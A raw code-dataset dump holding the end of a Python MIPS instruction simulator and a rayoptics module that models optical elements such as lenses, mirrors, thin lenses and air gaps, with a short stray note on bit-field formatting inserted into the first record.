str(registers[9]) + '\\t' + str(registers[10]) + '\\t' + str(registers[11]) + '\\t' + str(registers[12]) + '\\t' + str(registers[13]) + '\\t' + str(registers[14]) + '\\t' + str(registers[15]))\r\n\tsimOut.write('\\nr16:\\t' + str(registers[16]) + '\\t' + str(registers[17]) + '\\t' + str(registers[18]) + '\\t' + str(registers[19]) + '\\t' + str(registers[20]) + '\\t' + str(registers[21]) + '\\t' + str(registers[22]) + '\\t' + str(registers[23]))\r\n\tsimOut.write('\\nr24:\\t' + str(registers[24]) + '\\t' + str(registers[25]) + '\\t' + str(registers[26]) + '\\t' + str(registers[27]) + '\\t' + str(registers[28]) + '\\t' + str(registers[29]) + '\\t' + str(registers[30]) + '\\t' + str(registers[31]))\r\n\tsimOut.write('\\n\\ndata:\\n')\r\n\t\r\n\tdataSize = len(data) #used for how many data points are to be printed\r\n\tlistLength = int(dataSize/8) #used for how many lines needed to be 
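`printDis` and `printSim` above rebuild the same 1-5-5-5-5-5-6 bit grouping by hand in every opcode branch. A zero-padded helper produces it once and is immune to bin() dropping leading zero bits; a sketch:

```python
def fields(ins):
    # One rendering of the 1-5-5-5-5-5-6 grouping that printDis/printSim
    # reassemble per branch; format(ins, '032b') never drops leading zeros.
    b = format(ins, '032b')
    return ' '.join((b[0:1], b[1:6], b[6:11], b[11:16],
                     b[16:21], b[21:26], b[26:32]))

print(fields(0x00221820))  # 0 00000 00001 00010 00011 00000 100000
```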
printed\r\n\tif (listLength == 0):\r\n\t\tlistLength = 1\r\n\tglobal addressList\r\n\tdataLocation = None\r\n\tdataLocation = endPt #used for looking up address - endpt\r\n\tinfoLocation = 0 #used to track where in the data list the program is\r\n\ti = 0\r\n\t\r\n\twhile (i < listLength):\r\n\t\tsimOut.write(str(addressList[dataLocation]) + ':\\t')\r\n\t\tj = 0\r\n\t\ti = i + 1\r\n\t\twhile (j < 8):\r\n\t\t\tif (j == (dataSize - 1)):\r\n\t\t\t\tj = 8\r\n\t\t\tsimOut.write(str(data[infoLocation]) + '\\t')\r\n\t\t\tinfoLocation = infoLocation + 1\r\n\t\t\tj = j + 1\r\n\t\tsimOut.write('\\n')\r\n\tsimOut.write('\\n')\r\n\r\ndef printInvalid(ins, address, disOut):\r\n\tbinNum = str(bin(ins)[2:])\r\n\tnumLength = len(binNum)\r\n\tif (numLength != 32):\r\n\t\tnumToAdd = 32 - numLength\r\n\t\tbinNum = str('0' * numToAdd) + str(binNum)\r\n\tdisOut.write(str(binNum)[2:3] + ' ' + str(binNum)[3:8] + ' ' + str(binNum)[8:13] + ' ' + str(binNum)[13:18] + ' ' + str(binNum)[18:23] + ' ' + str(binNum)[23:28] + ' ' + str(binNum)[28:] + '\\t' + str(address) + '\\t' + 'Invalid Instruction\\n')\r\n\r\ndef main():\r\n\t#file io stuff:\r\n\tdisOut = open(sys.argv[2] + '_dis.txt', 'w')\r\n\tsimOut = open(sys.argv[2] + '_sim.txt', 'w')\r\n\t\r\n\tinstructions = []\r\n\topCode = []\r\n\trsBits = []\r\n\tfuncBits = []\r\n\timmediate = []\r\n\t#data is initialized after the break.\r\n\tdata = []\r\n\tregisters = []\r\n\tinitializeRegisters(registers)\r\n\tstdOPCodes = initializeOPCodes()\r\n\taddresses = readFromFile(opCode, rsBits, instructions, immediate)\r\n\tfuncBits = initializeFuncCodes(instructions)\r\n\tvalidity = checkOPCode(opCode, stdOPCodes) #false if invalid, true if valid, makes for printing and reading easier later.\r\n\tinstructionEnd = getData(data, validity, instructions)\r\n\tdetermineInstruction(instructions, opCode, funcBits, stdOPCodes, validity, instructionEnd, data, registers, addresses, disOut, simOut, immediate)\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()\r\n\r\n","sub_path":"mipssim.py","file_name":"mipssim.py","file_ext":"py","file_size_in_byte":29086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"375656429","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Copyright © 2018 Michael J. Hayford\n\"\"\" Module for element modeling\n\n.. Created on Sun Jan 28 16:27:01 2018\n\n.. codeauthor: Michael J. 
Hayford\n\"\"\"\n\nimport logging\nfrom collections import namedtuple\n\nimport math\nimport numpy as np\n\nimport rayoptics.util.rgbtable as rgbt\nimport rayoptics.optical.thinlens as thinlens\nfrom rayoptics.optical.profiles import Spherical, Conic\nfrom rayoptics.optical.surface import Surface\nfrom rayoptics.optical.gap import Gap\nimport rayoptics.gui.appcmds as cmds\nfrom rayoptics.gui.actions import Action, AttrAction, SagAction, BendAction\nfrom rayoptics.optical.medium import Glass, glass_decode\nfrom rayoptics.optical.model_enums import DecenterType\nimport rayoptics.optical.model_constants as mc\nimport opticalglass.glasspolygons as gp\n\nGraphicsHandle = namedtuple('GraphicsHandle', ['polydata', 'tfrm', 'polytype'])\n\"\"\" tuple grouping together graphics rendering data\n\n Attributes:\n polydata: poly data in local coordinates\n tfrm: global transformation for polydata\n polytype: 'polygon' (for filled) or 'polyline'\n\"\"\"\n\n\ndef create_thinlens(power=0., indx=1.5, sd=None, **kwargs):\n tl = thinlens.ThinLens(power=power, ref_index=indx, max_ap=sd, **kwargs)\n tle = ThinElement(tl)\n return [[tl, None, None, 1, +1]], [tle]\n\n\ndef create_mirror(c=0.0, r=None, cc=0.0, ec=None,\n power=None, profile=None, sd=None, **kwargs):\n '''Create a sequence and element for a mirror.\n\n Args:\n c: vertex curvature\n r: vertex radius of curvature\n cc: conic constant\n ec: 1 + cc\n power: optical power of the mirror\n sd: semi-diameter\n profile: Spherical or Conic\n '''\n delta_n = kwargs['delta_n'] if 'delta_n' in kwargs else -2\n if power:\n cv = power/delta_n\n elif r:\n cv = 1.0/r\n else:\n cv = c\n\n if ec:\n k = ec - 1.0\n else:\n k = cc\n\n if profile is Spherical:\n prf = Spherical(c=cv)\n elif profile is Conic:\n prf = Conic(c=cv, cc=k)\n else:\n if k == 0.0:\n prf = Spherical(c=cv)\n else:\n prf = Conic(c=cv, cc=k)\n\n m = Surface(profile=prf, interact_mode='reflect', max_ap=sd,\n delta_n=delta_n, **kwargs)\n me = Mirror(m, sd=sd)\n return [[m, None, None, 1, -1]], [me]\n\n\ndef create_lens(power=0., bending=0., th=None, sd=1., med=None):\n if med is None:\n med = Glass()\n rndx = med.rindex('d')\n cv1 = power/(2*(rndx - 1))\n cv2 = -power/(2*(rndx - 1))\n s1 = Surface(profile=Spherical(c=cv1), max_ap=sd, delta_n=(rndx - 1))\n s2 = Surface(profile=Spherical(c=cv2), max_ap=sd, delta_n=(1 - rndx))\n if th is None:\n th = sd/5\n g = Gap(t=th, med=med)\n le = Element(s1, s2, g, sd=sd)\n return [[s1, g, None, rndx, 1], [s2, None, None, 1, 1]], [le]\n\n\ndef create_dummy_plane(sd=1., **kwargs):\n s = Surface(**kwargs)\n se = DummyInterface(s, sd=sd)\n return [[s, None, None, 1, +1]], [se]\n\n\ndef create_air_gap(t=0., ref_ifc=None):\n g = Gap(t=t)\n ag = AirGap(g, ref_ifc)\n return g, ag\n\n\ndef create_from_file(filename, **kwargs):\n opm = cmds.open_model(filename)\n sm = opm.seq_model\n osp = opm.optical_spec\n em = opm.ele_model\n if 'power' in kwargs:\n desired_power = kwargs['power']\n cur_power = osp.parax_data.fod.power\n scale_factor = desired_power/cur_power\n sm.apply_scale_factor(scale_factor)\n em.elements_from_sequence(sm)\n seq = [list(node) for node in sm.path(start=1, stop=-1)]\n ele = [em.gap_dict[g] for g in sm.gaps[1:-1]]\n return seq, ele\n\n\nclass Element():\n clut = rgbt.RGBTable(filename='red_blue64.csv',\n data_range=[10.0, 100.])\n\n label_format = 'E{}'\n\n def __init__(self, s1, s2, g, tfrm=None, idx=0, idx2=1, sd=1.,\n label='Lens'):\n self.label = label\n if tfrm is not None:\n self.tfrm = tfrm\n else:\n self.tfrm = (np.identity(3), np.array([0., 
0., 0.]))\n self.s1 = s1\n self.s1_indx = idx\n self.s2 = s2\n self.s2_indx = idx2\n self.gap = g\n self.medium_name = self.gap.medium.name()\n self._sd = sd\n self.flat1 = None\n self.flat2 = None\n self.render_color = self.calc_render_color()\n self.handles = {}\n self.actions = {}\n\n @property\n def sd(self):\n return self._sd\n\n @sd.setter\n def sd(self, semidiam):\n self._sd = semidiam\n self.edge_extent = (-semidiam, semidiam)\n\n def __json_encode__(self):\n attrs = dict(vars(self))\n del attrs['parent']\n del attrs['tfrm']\n del attrs['s1']\n del attrs['s2']\n del attrs['gap']\n del attrs['handles']\n del attrs['actions']\n return attrs\n\n def __str__(self):\n fmt = 'Element: {!r}, {!r}, t={:.4f}, sd={:.4f}, glass: {}'\n return fmt.format(self.s1.profile, self.s2.profile, self.gap.thi,\n self.sd, self.gap.medium.name())\n\n def sync_to_restore(self, ele_model, surfs, gaps, tfrms):\n # when restoring, we want to use the stored indices to look up the\n # new object instances\n self.parent = ele_model\n self.tfrm = tfrms[self.s1_indx]\n self.s1 = surfs[self.s1_indx]\n self.gap = gaps[self.s1_indx]\n self.s2 = surfs[self.s2_indx]\n if not hasattr(self, 'medium_name'):\n self.medium_name = self.gap.medium.name()\n\n def sync_to_update(self, seq_model):\n # when updating, we want to use the stored object instances to get the\n # current indices into the interface list (e.g. to handle insertion and\n # deletion of interfaces)\n self.s1_indx = seq_model.ifcs.index(self.s1)\n self.s2_indx = seq_model.ifcs.index(self.s2)\n self.render_color = self.calc_render_color()\n\n def reference_interface(self):\n return self.s1\n\n def reference_idx(self):\n return self.s1_indx\n\n def interface_list(self):\n return [self.s1, self.s2]\n\n def gap_list(self):\n return [self.gap]\n\n def get_bending(self):\n cv1 = self.s1.profile_cv\n cv2 = self.s2.profile_cv\n delta_cv = cv1 - cv2\n bending = 0.\n if delta_cv != 0.0:\n bending = (cv1 + cv2)/delta_cv\n return bending\n\n def set_bending(self, bending):\n cv1 = self.s1.profile_cv\n cv2 = self.s2.profile_cv\n delta_cv = cv1 - cv2\n cv2_new = 0.5*(bending - 1.)*delta_cv\n cv1_new = bending*delta_cv - cv2_new\n self.s1.profile_cv = cv1_new\n self.s2.profile_cv = cv2_new\n\n def update_size(self):\n extents = np.union1d(self.s1.get_y_aperture_extent(),\n self.s2.get_y_aperture_extent())\n self.edge_extent = (extents[0], extents[-1])\n self.sd = max(self.s1.surface_od(), self.s2.surface_od())\n return self.sd\n\n def calc_render_color(self):\n try:\n gc = float(self.gap.medium.glass_code())\n except AttributeError:\n return (255, 255, 255, 64) # white\n else:\n # set element color based on V-number\n indx, vnbr = glass_decode(gc)\n dsg, rgb = gp.find_glass_designation(indx, vnbr)\n# rgb = Element.clut.get_color(vnbr)\n return rgb\n\n def compute_flat(self, s):\n ca = s.surface_od()\n if (1.0 - ca/self.sd) >= 0.05:\n flat = ca\n else:\n flat = None\n return flat\n\n def extent(self):\n if hasattr(self, 'edge_extent'):\n return self.edge_extent\n else:\n return (-self.sd, self.sd)\n\n def render_shape(self):\n if self.s1.profile_cv < 0.0:\n self.flat1 = self.compute_flat(self.s1)\n poly = self.s1.full_profile(self.extent(), self.flat1)\n if self.s2.profile_cv > 0.0:\n self.flat2 = self.compute_flat(self.s2)\n poly2 = self.s2.full_profile(self.extent(), self.flat2, -1)\n for p in poly2:\n p[0] += self.gap.thi\n poly += poly2\n poly.append(poly[0])\n return poly\n\n def render_handles(self, opt_model):\n self.handles = {}\n ifcs_gbl_tfrms = 
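A quick check of the bending math in `get_bending`/`set_bending` above: `set_bending` redistributes curvature at constant cv1 - cv2, so the shape factor round-trips while the curvature difference (hence thin-lens power) is preserved. Standalone sketch (function bodies mirror the methods; the free-function form is mine):

```python
def get_bending(cv1, cv2):
    # X = (c1 + c2) / (c1 - c2), the Coddington shape factor.
    d = cv1 - cv2
    return (cv1 + cv2) / d if d != 0.0 else 0.0

def set_bending(cv1, cv2, bending):
    # Redistributes curvature at constant (cv1 - cv2), so thin-lens
    # power is preserved while the shape factor changes.
    d = cv1 - cv2
    cv2_new = 0.5 * (bending - 1.0) * d
    return bending * d - cv2_new, cv2_new

c1, c2 = set_bending(0.02, -0.01, 0.5)
assert abs(get_bending(c1, c2) - 0.5) < 1e-12   # shape factor round-trips
assert abs((c1 - c2) - 0.03) < 1e-12            # curvature difference kept
```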
opt_model.seq_model.gbl_tfrms\n\n shape = self.render_shape()\n self.handles['shape'] = GraphicsHandle(shape, self.tfrm, 'polygon')\n\n extent = self.extent()\n if self.flat1 is not None:\n extent_s1 = self.flat1,\n else:\n extent_s1 = extent\n poly_s1 = self.s1.full_profile(extent_s1, None)\n gh1 = GraphicsHandle(poly_s1, ifcs_gbl_tfrms[self.s1_indx], 'polyline')\n self.handles['s1_profile'] = gh1\n\n if self.flat2 is not None:\n extent_s2 = self.flat2,\n else:\n extent_s2 = extent\n poly_s2 = self.s2.full_profile(extent_s2, None, -1)\n gh2 = GraphicsHandle(poly_s2, ifcs_gbl_tfrms[self.s2_indx], 'polyline')\n self.handles['s2_profile'] = gh2\n\n poly_sd_upr = []\n poly_sd_upr.append([poly_s1[-1][0], extent[1]])\n poly_sd_upr.append([poly_s2[0][0]+self.gap.thi, extent[1]])\n self.handles['sd_upr'] = GraphicsHandle(poly_sd_upr, self.tfrm,\n 'polyline')\n\n poly_sd_lwr = []\n poly_sd_lwr.append([poly_s2[-1][0]+self.gap.thi, extent[0]])\n poly_sd_lwr.append([poly_s1[0][0], extent[0]])\n self.handles['sd_lwr'] = GraphicsHandle(poly_sd_lwr, self.tfrm,\n 'polyline')\n\n poly_ct = []\n poly_ct.append([0., 0.])\n poly_ct.append([self.gap.thi, 0.])\n self.handles['ct'] = GraphicsHandle(poly_ct, self.tfrm, 'polyline')\n\n return self.handles\n\n def handle_actions(self):\n self.actions = {}\n\n shape_actions = {}\n shape_actions['pt'] = BendAction(self)\n shape_actions['y'] = AttrAction(self, 'sd')\n self.actions['shape'] = shape_actions\n\n s1_prof_actions = {}\n s1_prof_actions['pt'] = SagAction(self.s1)\n self.actions['s1_profile'] = s1_prof_actions\n\n s2_prof_actions = {}\n s2_prof_actions['pt'] = SagAction(self.s2)\n self.actions['s2_profile'] = s2_prof_actions\n\n sd_upr_action = {}\n sd_upr_action['y'] = AttrAction(self, 'sd')\n self.actions['sd_upr'] = sd_upr_action\n\n sd_lwr_action = {}\n sd_lwr_action['y'] = AttrAction(self, 'sd')\n self.actions['sd_lwr'] = sd_lwr_action\n\n ct_action = {}\n ct_action['x'] = AttrAction(self.gap, 'thi')\n self.actions['ct'] = ct_action\n\n return self.actions\n\n\nclass Mirror():\n\n label_format = 'M{}'\n\n def __init__(self, ifc, tfrm=None, idx=0, sd=1., thi=None, z_dir=1.0,\n label='Mirror'):\n self.label = label\n# self.render_color = (192, 192, 192, 112)\n self.render_color = (158, 158, 158, 64)\n# self.render_color = (64, 64, 64, 64)\n if tfrm is not None:\n self.tfrm = tfrm\n else:\n self.tfrm = (np.identity(3), np.array([0., 0., 0.]))\n self.s = ifc\n self.s_indx = idx\n self.z_dir = z_dir\n self.sd = sd\n self.flat = None\n self.thi = thi\n self.medium_name = 'Mirror'\n self.handles = {}\n self.actions = {}\n\n def get_thi(self):\n thi = self.thi\n if self.thi is None:\n thi = 0.05*self.sd\n return thi\n\n def __json_encode__(self):\n attrs = dict(vars(self))\n del attrs['parent']\n del attrs['tfrm']\n del attrs['s']\n del attrs['handles']\n del attrs['actions']\n return attrs\n\n def __str__(self):\n thi = self.get_thi()\n fmt = 'Mirror: {!r}, t={:.4f}, sd={:.4f}'\n return fmt.format(self.s.profile, thi, self.sd)\n\n def sync_to_restore(self, ele_model, surfs, gaps, tfrms):\n self.parent = ele_model\n self.tfrm = tfrms[self.s_indx]\n self.s = surfs[self.s_indx]\n if not hasattr(self, 'medium_name'):\n self.medium_name = 'Mirror'\n\n def reference_interface(self):\n return self.s\n\n def reference_idx(self):\n return self.s_indx\n\n def interface_list(self):\n return [self.s]\n\n def gap_list(self):\n return []\n\n def sync_to_update(self, seq_model):\n self.s_indx = seq_model.ifcs.index(self.s)\n\n def update_size(self):\n self.edge_extent = 
self.s.get_y_aperture_extent()\n self.sd = self.s.surface_od()\n return self.sd\n\n def extent(self):\n if hasattr(self, 'edge_extent'):\n return self.edge_extent\n else:\n self.edge_extent = self.s.get_y_aperture_extent()\n return self.edge_extent\n\n def render_shape(self):\n poly = self.s.full_profile(self.extent(), self.flat)\n poly2 = self.s.full_profile(self.extent(), self.flat, -1)\n\n thi = self.get_thi()\n offset = thi*self.z_dir\n\n for p in poly2:\n p[0] += offset\n poly += poly2\n poly.append(poly[0])\n return poly\n\n def render_handles(self, opt_model):\n self.handles = {}\n ifcs_gbl_tfrms = opt_model.seq_model.gbl_tfrms\n\n self.handles['shape'] = GraphicsHandle(self.render_shape(), self.tfrm,\n 'polygon')\n\n poly = self.s.full_profile(self.extent(), None)\n self.handles['s_profile'] = GraphicsHandle(poly,\n ifcs_gbl_tfrms[self.s_indx],\n 'polyline')\n\n thi = self.get_thi()\n offset = thi*self.z_dir\n\n poly_sd_upr = []\n poly_sd_upr.append(poly[-1])\n poly_sd_upr.append([poly[-1][0]+offset, poly[-1][1]])\n self.handles['sd_upr'] = GraphicsHandle(poly_sd_upr, self.tfrm,\n 'polyline')\n\n poly_sd_lwr = []\n poly_sd_lwr.append(poly[0])\n poly_sd_lwr.append([poly[0][0]+offset, poly[0][1]])\n self.handles['sd_lwr'] = GraphicsHandle(poly_sd_lwr, self.tfrm,\n 'polyline')\n\n return self.handles\n\n def handle_actions(self):\n self.actions = {}\n\n shape_actions = {}\n shape_actions['pt'] = SagAction(self.s)\n self.actions['shape'] = shape_actions\n\n s_prof_actions = {}\n s_prof_actions['pt'] = SagAction(self.s)\n self.actions['s_profile'] = s_prof_actions\n\n sd_upr_action = {}\n sd_upr_action['y'] = AttrAction(self, 'edge_extent[1]')\n self.actions['sd_upr'] = sd_upr_action\n\n sd_lwr_action = {}\n sd_lwr_action['y'] = AttrAction(self, 'edge_extent[0]')\n self.actions['sd_lwr'] = sd_lwr_action\n\n return self.actions\n\n\nclass ThinElement():\n\n label_format = 'TL{}'\n\n def __init__(self, ifc, tfrm=None, idx=0, sd=None, label='ThinLens'):\n self.label = label\n self.render_color = (192, 192, 192)\n if tfrm is not None:\n self.tfrm = tfrm\n else:\n self.tfrm = (np.identity(3), np.array([0., 0., 0.]))\n self.intrfc = ifc\n self.intrfc_indx = idx\n self.medium_name = 'Thin Element'\n if sd is not None:\n self.sd = sd\n else:\n self.sd = ifc.max_aperture\n self.handles = {}\n self.actions = {}\n\n def __json_encode__(self):\n attrs = dict(vars(self))\n del attrs['parent']\n del attrs['tfrm']\n del attrs['intrfc']\n del attrs['handles']\n del attrs['actions']\n return attrs\n\n def __str__(self):\n return str(self.intrfc)\n\n def sync_to_restore(self, ele_model, surfs, gaps, tfrms):\n self.parent = ele_model\n self.tfrm = tfrms[self.intrfc_indx]\n self.intrfc = surfs[self.intrfc_indx]\n if not hasattr(self, 'medium_name'):\n self.medium_name = 'Thin Element'\n\n def reference_interface(self):\n return self.intrfc\n\n def reference_idx(self):\n return self.intrfc_indx\n\n def interface_list(self):\n return [self.intrfc]\n\n def gap_list(self):\n return []\n\n def sync_to_update(self, seq_model):\n self.intrfc_indx = seq_model.ifcs.index(self.intrfc)\n\n def update_size(self):\n self.sd = self.intrfc.surface_od()\n return self.sd\n\n def render_shape(self):\n poly = self.intrfc.full_profile((-self.sd, self.sd))\n return poly\n\n def render_handles(self, opt_model):\n self.handles = {}\n shape = self.render_shape()\n self.handles['shape'] = GraphicsHandle(shape, self.tfrm, 'polygon')\n return self.handles\n\n def handle_actions(self):\n self.actions = {}\n return 
self.actions\n\n\nclass DummyInterface():\n\n label_format = 'D{}'\n\n def __init__(self, ifc, idx=0, sd=None, tfrm=None, label='DummyInterface'):\n self.label = label\n self.render_color = (192, 192, 192)\n if tfrm is not None:\n self.tfrm = tfrm\n else:\n self.tfrm = (np.identity(3), np.array([0., 0., 0.]))\n self.ref_ifc = ifc\n self.idx = idx\n self.medium_name = 'Interface'\n if sd is not None:\n self.sd = sd\n else:\n self.sd = ifc.max_aperture\n self.handles = {}\n self.actions = {}\n\n def __json_encode__(self):\n attrs = dict(vars(self))\n del attrs['parent']\n del attrs['tfrm']\n del attrs['ref_ifc']\n del attrs['handles']\n del attrs['actions']\n return attrs\n\n def __str__(self):\n return str(self.ref_ifc)\n\n def sync_to_restore(self, ele_model, surfs, gaps, tfrms):\n self.parent = ele_model\n self.tfrm = tfrms[self.idx]\n self.ref_ifc = surfs[self.idx]\n if not hasattr(self, 'medium_name'):\n self.medium_name = 'Interface'\n\n def reference_interface(self):\n return self.ref_ifc\n\n def reference_idx(self):\n return self.idx\n\n def interface_list(self):\n return [self.ref_ifc]\n\n def gap_list(self):\n return []\n\n def sync_to_update(self, seq_model):\n self.idx = seq_model.ifcs.index(self.ref_ifc)\n\n def update_size(self):\n self.sd = self.ref_ifc.surface_od()\n return self.sd\n\n def render_shape(self):\n poly = self.ref_ifc.full_profile((-self.sd, self.sd))\n return poly\n\n def render_handles(self, opt_model):\n self.handles = {}\n\n self.handles['shape'] = GraphicsHandle(self.render_shape(), self.tfrm,\n 'polyline')\n\n return self.handles\n\n def handle_actions(self):\n self.actions = {}\n\n def get_adj_spaces():\n seq_model = self.parent.opt_model.seq_model\n if self.idx > 0:\n before = seq_model.gaps[self.idx-1].thi\n else:\n before = None\n if self.idx < seq_model.get_num_surfaces() - 1:\n after = seq_model.gaps[self.idx].thi\n else:\n after = None\n return (before, after)\n\n def set_adj_spaces(cur_value, change):\n seq_model = self.parent.opt_model.seq_model\n if cur_value[0] is not None:\n seq_model.gaps[self.idx-1].thi = cur_value[0] + change\n if cur_value[1] is not None:\n seq_model.gaps[self.idx].thi = cur_value[1] - change\n\n slide_action = {}\n slide_action['x'] = Action(get_adj_spaces, set_adj_spaces)\n self.actions['shape'] = slide_action\n\n return self.actions\n\n\nclass AirGap():\n\n label_format = 'AirGap {}'\n\n def __init__(self, g, ref_ifc, idx=0, tfrm=None, label='AirGap'):\n if tfrm is not None:\n self.tfrm = tfrm\n else:\n self.tfrm = (np.identity(3), np.array([0., 0., 0.]))\n self.label = label\n self.render_color = (237, 243, 254, 64) # light blue\n self.gap = g\n self.medium_name = self.gap.medium.name()\n self.ref_ifc = ref_ifc\n self.idx = idx\n self.handles = {}\n self.actions = {}\n\n def __json_encode__(self):\n attrs = dict(vars(self))\n del attrs['parent']\n del attrs['tfrm']\n del attrs['gap']\n del attrs['ref_ifc']\n del attrs['handles']\n del attrs['actions']\n return attrs\n\n def __str__(self):\n return str(self.gap)\n\n def sync_to_restore(self, ele_model, surfs, gaps, tfrms):\n self.parent = ele_model\n self.gap = gaps[self.idx]\n self.ref_ifc = surfs[self.idx]\n self.tfrm = tfrms[self.idx]\n if not hasattr(self, 'render_color'):\n self.render_color = (237, 243, 254, 64) # light blue\n if not hasattr(self, 'medium_name'):\n self.medium_name = self.gap.medium.name()\n\n def reference_interface(self):\n return self.ref_ifc\n\n def reference_idx(self):\n return self.idx\n\n def interface_list(self):\n return []\n\n def 
gap_list(self):\n        return [self.gap]\n\n    def sync_to_update(self, seq_model):\n        self.idx = seq_model.gaps.index(self.gap)\n\n    def update_size(self):\n        pass\n\n    def render_handles(self, opt_model):\n        self.handles = {}\n\n        poly_ct = []\n        poly_ct.append([0., 0.])\n        poly_ct.append([self.gap.thi, 0.])\n\n        # Modify the tfrm to account for any decenters following\n        # the reference ifc.\n        tfrm = self.tfrm\n        if self.ref_ifc.decenter is not None:\n            d = self.ref_ifc.decenter\n            r_global, t_global = tfrm\n            r_after_ifc, t_after_ifc = d.tform_after_surf()\n            t = r_global.dot(t_after_ifc) + t_global\n            r = r_global if r_after_ifc is None else r_global.dot(r_after_ifc)\n            tfrm = r, t\n\n        self.handles['ct'] = GraphicsHandle(poly_ct, tfrm, 'polyline')\n\n        return self.handles\n\n    def handle_actions(self):\n        self.actions = {}\n\n        ct_action = {}\n        ct_action['x'] = AttrAction(self.gap, 'thi')\n        self.actions['ct'] = ct_action\n\n        return self.actions\n\n\nclass ElementModel:\n\n    def __init__(self, opt_model):\n        self.opt_model = opt_model\n        self.elements = []\n        self.ifcs_dict = {}\n        self.gap_dict = {}\n\n    def reset(self):\n        # re-run __init__, preserving the link to the parent optical model\n        self.__init__(self.opt_model)\n\n    def __json_encode__(self):\n        attrs = dict(vars(self))\n        del attrs['opt_model']\n        del attrs['ifcs_dict']\n        del attrs['gap_dict']\n        return attrs\n\n    def sync_to_restore(self, opt_model):\n        self.opt_model = opt_model\n        seq_model = opt_model.seq_model\n        surfs = seq_model.ifcs\n        gaps = seq_model.gaps\n        tfrms = seq_model.compute_global_coords(1)\n\n        self.ifcs_dict = {}\n        self.gap_dict = {}\n\n        # special processing for older models\n        self.airgaps_from_sequence(seq_model, tfrms)\n        self.add_dummy_interface_at_image(seq_model, tfrms)\n\n        for i, e in enumerate(self.elements):\n            e.sync_to_restore(self, surfs, gaps, tfrms)\n            for ifc in e.interface_list():\n                self.ifcs_dict[ifc] = e\n            for g in e.gap_list():\n                self.gap_dict[g] = e\n            if not hasattr(e, 'label'):\n                e.label = e.label_format.format(i+1)\n        self.sequence_elements()\n        self.relabel_airgaps()\n#        self.list_elements()\n\n    def elements_from_sequence(self, seq_model):\n        \"\"\" generate an element list from a sequential model \"\"\"\n\n        # if there are elements in the list already, just return\n        if len(self.elements) > 0:\n            return\n\n        num_elements = 0\n        tfrms = seq_model.compute_global_coords(1)\n        for i, g in enumerate(seq_model.gaps):\n            s1 = seq_model.ifcs[i]\n            tfrm = tfrms[i]\n            if g.medium.name().lower() == 'air':\n                if i > 0:\n                    self.process_airgap(seq_model, i, g, s1, tfrm,\n                                        num_elements, add_ele=True)\n            else: # a non-air medium\n                # handle buried mirror, e.g. 
prism or Mangin mirror\n if s1.interact_mode == 'reflect':\n gp = seq_model.gaps[i-1]\n if gp.medium.name().lower() == g.medium.name().lower():\n continue\n\n s2 = seq_model.ifcs[i+1]\n sd = max(s1.surface_od(), s2.surface_od())\n e = Element(s1, s2, g, sd=sd, tfrm=tfrm, idx=i, idx2=i+1)\n num_elements += 1\n e.label = Element.label_format.format(num_elements)\n self.add_element(e)\n\n self.add_dummy_interface_at_image(seq_model, tfrms)\n\n self.relabel_airgaps()\n\n def process_airgap(self, seq_model, i, g, s, tfrm, num_ele, add_ele=True):\n if s.interact_mode == 'reflect' and add_ele:\n sd = s.surface_od()\n z_dir = seq_model.z_dir[i]\n m = Mirror(s, sd=sd, tfrm=tfrm, idx=i, z_dir=z_dir)\n num_ele += 1\n m.label = Mirror.label_format.format(num_ele)\n self.add_element(m)\n elif s.interact_mode == 'transmit':\n add_dummy = False\n if i == 0:\n add_dummy = True # add dummy for the object\n dummy_label = 'Object'\n else: # i > 0\n gp = seq_model.gaps[i-1]\n if gp.medium.name().lower() == 'air':\n add_dummy = True\n if seq_model.stop_surface == i:\n dummy_label = 'Aperture Stop'\n else:\n dummy_label = DummyInterface.label_format.format(i)\n if add_dummy:\n tfrm = tfrm\n sd = s.surface_od()\n di = DummyInterface(s, sd=sd, tfrm=tfrm, idx=i)\n di.label = dummy_label\n self.add_element(di)\n elif isinstance(s, thinlens.ThinLens) and add_ele:\n te = ThinElement(s, tfrm=tfrm, idx=i)\n num_ele += 1\n te.label = ThinElement.label_format.format(num_ele)\n self.add_element(te)\n\n # add an AirGap\n ag = AirGap(g, s, idx=i, tfrm=tfrm)\n self.add_element(ag)\n\n def airgaps_from_sequence(self, seq_model, tfrms):\n \"\"\" add airgaps and dummy interfaces to an older version model \"\"\"\n for e in self.elements:\n if isinstance(e, AirGap):\n return # found an AirGap, model probably OK\n\n num_elements = 0\n seq_model = self.opt_model.seq_model\n for i, g in enumerate(seq_model.gaps):\n if g.medium.name().lower() == 'air':\n if i > 0:\n s = seq_model.ifcs[i]\n tfrm = tfrms[i]\n self.process_airgap(seq_model, i, g, s, tfrm,\n num_elements, add_ele=False)\n\n def add_dummy_interface_at_image(self, seq_model, tfrms):\n if len(self.elements) and self.elements[-1].label == 'Image':\n return\n\n s = seq_model.ifcs[-1]\n idx = seq_model.get_num_surfaces() - 1\n di = DummyInterface(s, sd=s.surface_od(), tfrm=tfrms[-1], idx=idx)\n di.label = 'Image'\n self.add_element(di)\n\n def update_model(self):\n seq_model = self.opt_model.seq_model\n tfrms = seq_model.compute_global_coords(1)\n for e in self.elements:\n e.update_size()\n e.sync_to_update(seq_model)\n intrfc = e.reference_interface()\n try:\n i = seq_model.ifcs.index(intrfc)\n except ValueError:\n print(\"Interface {} not found\".format(intrfc.lbl))\n else:\n e.tfrm = tfrms[i]\n self.sequence_elements()\n\n def sequence_elements(self):\n \"\"\" Sort elements in order of reference interfaces in seq_model \"\"\"\n seq_model = self.opt_model.seq_model\n self.elements.sort(key=lambda e:\n seq_model.ifcs.index(e.reference_interface()))\n\n def relabel_airgaps(self):\n for i, e in enumerate(self.elements):\n if isinstance(e, AirGap):\n eb = self.elements[i-1].label\n ea = self.elements[i+1].label\n e.label = AirGap.label_format.format(eb + '-' + ea)\n\n def add_element(self, e):\n e.parent = self\n self.elements.append(e)\n for ifc in e.interface_list():\n self.ifcs_dict[ifc] = e\n for g in e.gap_list():\n self.gap_dict[g] = e\n\n def remove_element(self, e):\n for ifc in e.interface_list():\n self.ifcs_dict.pop(ifc)\n for g in e.gap_list():\n 
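# also remove this gap's entry so the gap-to-element lookup stays consistent\n            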
